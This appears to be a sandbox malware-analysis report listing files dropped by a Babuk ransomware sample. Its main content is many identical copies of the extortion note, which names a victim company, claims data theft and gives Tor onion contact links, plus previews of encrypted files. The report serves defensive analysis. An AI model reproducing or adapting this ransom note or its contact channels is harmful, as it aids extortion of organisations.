                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Messaging_8wekyb3d8bbwe\AC\INetHistory\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Messaging_8wekyb3d8bbwe\AC\Temp\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Messaging_8wekyb3d8bbwe\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Messaging_8wekyb3d8bbwe\LocalCache\HasRegisteredAsDefaultApp.setting.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):172
                                                                            Entropy (8bit):6.5037746936532566
                                                                            Encrypted:false
                                                                            SSDEEP:3:M+2FXvDkFBVUq35Zu6Mt/+/oZEeqFIpq5pScpdPfRiLUxNvEEn:M+2BCVX5ZuXt+czg13ScfgL0vtn
                                                                            MD5:3F4ECBE391B92BC921F7933608A66136
                                                                            SHA1:0F24062BAEF6AF1E9266CFA494A44EF65F78E42F
                                                                            SHA-256:B418A4E20441F0EED18CB89235E3F301E96AFB73CCC104E785B14324B99DAA56
                                                                            SHA-512:15998BE9B259DA78EA06027DDD224F0AAEEF127F65575577151B83C9D7FA1DDCD89EBE42C2E9046C25A77DA4A42BABC09217BFA106C26B7448890A29DB573279
                                                                            Malicious:false
                                                                            Preview: ........n-...!........'..&....$8......*.#.D...u...%...E.9.....j..6d..~Kx...QH.d.I.|^.S.DAhtz.8.rd ......._...N.7..D............@O.....choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Messaging_8wekyb3d8bbwe\LocalCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Messaging_8wekyb3d8bbwe\LocalCache\MessagingBackgroundTaskLog.etl.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):24744
                                                                            Entropy (8bit):7.99270359538762
                                                                            Encrypted:true
                                                                            SSDEEP:768:rZQoYyBMPvd8FEvnIQzVpsp5XOP/5IsDeJ097Ww:Z/CPVVvTzVAXKh/eu7Ww
                                                                            MD5:245F97A15A31A71FE51F572C58E371A2
                                                                            SHA1:27578FA3EFBEE6709F0449A528980A2D5D3675B1
                                                                            SHA-256:392991AD4C1349E09DC9398AA7174A2E47DE6B5A730033E0E3D5F4F64B2F7A3E
                                                                            SHA-512:B3BB59FAED083D1719D3B85A39046D08EA4EC541ECADF19C8A41FAD1D253709D4567ED6356EA7A5A977FEEC0EE6CF52F29B63DBFCE7CAA8DA2C1BB364CD78E80
                                                                            Malicious:true
                                                                            Preview: KQ.J.>..i..Vu.....dO....mc.U.}..g.......L.Q..,.t....7 .d..N=...".._._...F..$N..=..h..H.w.:g0....?....g."...%}..Fz..-5;.I......+....G....?.N...Ld....wp{....0-.......3..e.g.).2....&o.....8....?g....J.t..D..e.......2.a.Wt..g..yy.........eA..B]...5..auN..Z.$....z..U...k...=")m....<.1."J..p.F..H-..(D.\S .|...F\..a.N..= ..._...P.Q.r..|O$..........L.n,..;.(.`....|:u.Mq..='.Y..Yc.|A.....(pu[...1Ss.9..7..EcD.P....c.P....0/(....&K0..f.\...v..P.b%....J.~.b.R.f.v..J...\4t*pSo~.p..=z.....>.B..N.".#.4`...q.KP.9...H..&....S..4..n...n.l.%3~..T._.. .[...j....>....#.....n7R.1X$..Z{."...@.N.w.(6.#....Y...{N]M.t....._d..2:..Pc8..R...u.F3.T......x.....s.n.....6.J.3..L.....|Y.G./.2.H4.y..:s.o.|....G.GFQ.p..#.Y......B..}..f.O..p{..q&.....VD0..fO..Ix.....p.a....z.d?r....ze...Q........:R.Y0.w.BR..r.4..W!y...>.)$>....C.E.[.........F......l.............Q....3......|........A+..3m.P..<CK}.>.}.Bd..U...i.......^....~....`...$..\3MJB....(...UB....a....VF.HW.mC........
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Messaging_8wekyb3d8bbwe\LocalCache\TransportIdList.setting.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):173
                                                                            Entropy (8bit):6.521014860883482
                                                                            Encrypted:false
                                                                            SSDEEP:3:Xu/g9z8m1rauzxiTKG7rbm7q4UJxha4qFrX+hRJqllc9UxNvEEn:e+z8WTIJrsq4UJxhaxrX+HJeO90vtn
                                                                            MD5:F6581708AA801EFEAF0C02BA5B1C331A
                                                                            SHA1:34128D410E79DF8A11A6E47A81E2FA0488A627B0
                                                                            SHA-256:4C564C04CA8432FD90AD96E3A0783353FF92D19A84D8C6885D18172550707C51
                                                                            SHA-512:D9C2D74B07A5F77C6AB2239C30971A6240ED17AD8CAE889F46DEC952A27C1F71D9BE36DE6453680FD0F6D4A4F3053CA73265D1BCD91F963E95C3221009DAC3B9
                                                                            Malicious:false
                                                                            Preview: .#.2......u..T..S?ty../......f..../...(...@.6-.{.....ofIs..p.p.ad~....[.....~..........@....l.TJ{.....X....0....`o..A.k...y.i>..t..:......choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Messaging_8wekyb3d8bbwe\LocalState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Messaging_8wekyb3d8bbwe\RoamingState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Messaging_8wekyb3d8bbwe\Settings\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Messaging_8wekyb3d8bbwe\Settings\roaming.lock.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):168
                                                                            Entropy (8bit):6.574916752942751
                                                                            Encrypted:false
                                                                            SSDEEP:3:tlvM2dyaHlKv+wbpNucbV3EcVDUFjmokLRsLI9QSXXgvBQLUxNvEEn:d/k3bVUcVwZm51j9DXXgaL0vtn
                                                                            MD5:3D4C52DF0D7A4FD9E7182C0C6BA18C77
                                                                            SHA1:5A30A6DB7AF2D2F321AD0CE0B88A03E728916715
                                                                            SHA-256:6BFD6C18E3AA2538222DFF5137F266D94B9E1F8720934FAD5018C8B38A43B0CF
                                                                            SHA-512:6E3A69E39D411D665B34015DBC5FB0F9FF14DFB3C78CBCDDE54CBD3F93003071812F5D5C8E45BA204B8CCD97349E23EE13307A967B3ADEF28AB422628BB092F0
                                                                            Malicious:false
                                                                            Preview: ......8k.....7....|M0..sD.O"....a..PB...f~L...^./.....B7......gb.+GA....[ ...1.$..W...}<Q.]...8m....H....8.mm..d_!].p......choung dong looks like hot dog!!
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Messaging_8wekyb3d8bbwe\Settings\settings.dat.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):8360
                                                                            Entropy (8bit):7.980361298814639
                                                                            Encrypted:false
                                                                            SSDEEP:192:hzVkxCxe1FrjPMFEqo62boiIR0G1guOIqS5QEGtAS:hzOExevUa/IRRes5pGtAS
                                                                            MD5:1D271A929975BC1C147CDD34F99CBFDB
                                                                            SHA1:1F5A96D4DB0B8DE5D486445882DCE1B8084D6C9F
                                                                            SHA-256:943D39502D54A50BB9F0CCFC875F40A65CC86494983063743B5F2F19CB1DDE21
                                                                            SHA-512:D7CA75DC6AA38BB0CC9C7D2C41B5189675B057B4534EB38BFFACA1A977C0598D15AB06BFBB4F12827C234BFE74A9EE88C7A2EFDAE08A7B0885712EDB09FD77DC
                                                                            Malicious:false
                                                                            Preview: ....s2.-...n.....3........e\...&^.[G.....T.+.......nZ..P...A!......H.....g.u}.......7...m.B.......z..n#q#:..&..U.#..j.i.6i...&..p..2.....ui..L`H,<.f1E.........-.=..{.......W....h.....k.s[..j.rt..'..Sb.....-&.C.pS.8M..>.^.y.......`.MX.&..h..~.p...Qo.I...x....P..~...(.h6S..y.v.....0....>.y*....N..G.L"..p.,.y)...[.@jj........'.;.@j.NC.g]..........]CE.....]..W&bB.j..D.GA1.x.<.z.....@.3&..rU.t....9H.s...d..m.g.4S"x.{..+..b..q...^.*y.C.........J...q.?...<).s.8..f9...%#....-N.M..y8....$...;T..-.9-O\r.7D.H.&H%....W.o}S..J..+.t.NT...9.".=..V.(T...L.B.{...,v..!.uR.t%.+.w..$(@.\M..G.U5.-.27W..4.eK.t...o.p..'.^..8..Jq.e.r_L.Hb.6..........U.].r.v.~....3...[.E7N.B-.ljeK.-....t.zK........^..k..._U.....\.o.q...tF.Oi4.M.kSg..3...x..|...:..z.UV.H...@,.c./..b...J..K.S`ULfh.t*..K.w.m.. ."......c.U.....s..X..aV....>...q..G..9...}....+^.....r.C..&..n...y.......kd.....Q....I.G./C.....x5....t...[.t...W.=..W..!Jn'.~...t..|.#C.nfW.3..H7YBz..:.d.4.b.a..[.&m?..$..C....Q....7.
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Messaging_8wekyb3d8bbwe\SystemAppData\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Messaging_8wekyb3d8bbwe\TempState\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Microsoft3DViewer_8wekyb3d8bbwe\AC\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Microsoft3DViewer_8wekyb3d8bbwe\AC\INetCache\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Microsoft3DViewer_8wekyb3d8bbwe\AC\INetCookies\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
